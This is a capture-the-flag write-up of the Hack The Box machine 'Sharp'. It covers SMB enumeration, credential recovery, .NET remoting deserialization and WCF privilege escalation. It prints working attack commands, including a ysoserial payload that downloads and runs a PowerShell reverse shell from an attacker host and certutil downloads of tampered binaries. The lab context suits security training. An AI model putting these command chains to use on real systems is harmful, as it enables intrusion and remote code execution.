Hackthebox Sharp WriteUp

Overview:

Sharp is a hard windows machine that exploits remoting server and wcf (Windows Communication Foundation), And they must done in a windows environment. There are public exploits (recompiled )out there from 2014, but they require many set up before run the exploits including serialization, after gotten a shell, there is a wcf folder and wcfclient exe file that running with admin privilege, by looking at the source code in visual studio that the attacker could take advantage of Main function and rebuild the exe file and run it on the victim’s machine to privilege escalation to Administrator. With all that being said, Let’s just jump in!

Recon:

┌──(root💀kali)-[~/htb/boxes/sharp]
└─# cat all 
# Nmap 7.91 scan initiated Sun Apr 25 16:08:08 2021 as: nmap -sC -sV -p- -oN all -v -Pn 10.10.10.219
Nmap scan report for 10.10.10.219
Host is up (0.065s latency).
Not shown: 65529 filtered ports
PORT     STATE SERVICE              VERSION
135/tcp  open  msrpc                Microsoft Windows RPC
139/tcp  open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5985/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
8889/tcp open  mc-nmf               .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 1m26s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-25T20:16:11
|_  start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 16:15:22 2021 -- 1 IP address (1 host up) scanned in 434.84 seconds

Run smbclient

┌──(root💀kali)-[~/htb/boxes/sharp]
└─# smbclient -L //10.10.10.219/
Enter WORKGROUP\root's password: 
Anonymous login successful
Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        dev             Disk      
        IPC$            IPC       Remote IPC
        kanban          Disk      
SMB1 disabled -- no workgroup available

Get all the files.

This a Protable Kanban and L’m going to search exploits for that.

Offensive Security's Exploit Database Archive

Use the exploit with the PortableKanban.pk3 file path we download earlier. We got some credentials. So first off , l will try crackmapexec to check if there is any shares in smb.

Found use lars’s can access dev smb share.

┌──(root💀kali)-[~/htb/boxes/sharp/dev]
└─# cat notes.txt 
Todo:
    Migrate from .Net remoting to WCF
    Add input validation

There is a note.txt that indicates that its a .Net remoting server. and there are blogs about that.

https://downloads.immunityinc.com/infiltrate2019-slidepacks/christopher-anastasio-abusing-insecure-wcf-endpoints-for-profit-and-fun/abusing_wcf_endpoints.pdf

Intro to .NET Remoting for Hackers

Download these files and analysis those by dnspy on a windows vm, dnspy can decompile and compile exe files and check what they are doing.

Releases · dnSpy/dnSpy

Activator.GetObject(typeof(Remoting), "tcp://localhost:8888/SecretSharpDebugApplicationEndpoint"));
   channelSinkProperties["username"] = "debug";
   channelSinkProperties["password"] = "SharpApplicationDebugUserPassword123!";

tyranid/ExploitRemotingService

There is a pre-comopiled for remoting exploit.

parteeksingh005/ExploitRemotingService_Compiled

Before Run the exploit, we need to set up few things on a windows vm.

1. web hosting by node.js (you can use python if you want). Download and install node.js from below link and run http-server.cmd -p 80 to host files.

npm

2. nc64.exe

int0x33/nc.exe

3. Powershell revers shell.

samratashok/nishang

4. ysoserial for Serialization the revers shell.

frohoff/ysoserial

Start attacking

1. Generate a serialized reverse shell.

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.14.16/shell.ps1')

2. Host the web server with Powershell reverse shell.

4. Set nc64.exe listener.

3. Use the exploit with payload to get a shell.

ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw [Serialized Payload here]

PriEsc to Administrator:

Poking around and found a wcf folder.

Compress and copy to C:\dev

Compress-Archive -LiteralPath C:\users\lars\Documents\wcf -DestinationPath C:\users\lars\Documents\wcf.zip
move-item -path C:\users\lars\Documents\wcf.zip -destination c:\dev

on Windows vm run with lars’s credentials.

net use X: \\10.10.10.219\dev

We mounted a dev to windows VM.

There is a wcf zip file there is wcf.sln can be modified by visual studio.

note it running port 8889, So its running as privileged user, So what if we add a reverse shell and rebuild it. And if it executes on the shell, then we might have Administraotr’s shell.

Let’s add a powershell revers shell command and rebuild the file.

From the WcfClient directory, download WcfClient.exe and WcfRemotingLibrary.dll to the lars machine.

certutil -urlcache -f "http://10.10.14.16/WcfClient.exe" WcfClient.exe
certutil -urlcache -f "http://10.10.14.16/WcfRemotingLibrary.dll" WcfRemotingLibrary.dll

Run the WcfClient file to get a shell

Note it will executed with admin privilege. So that we are now nt authority\system.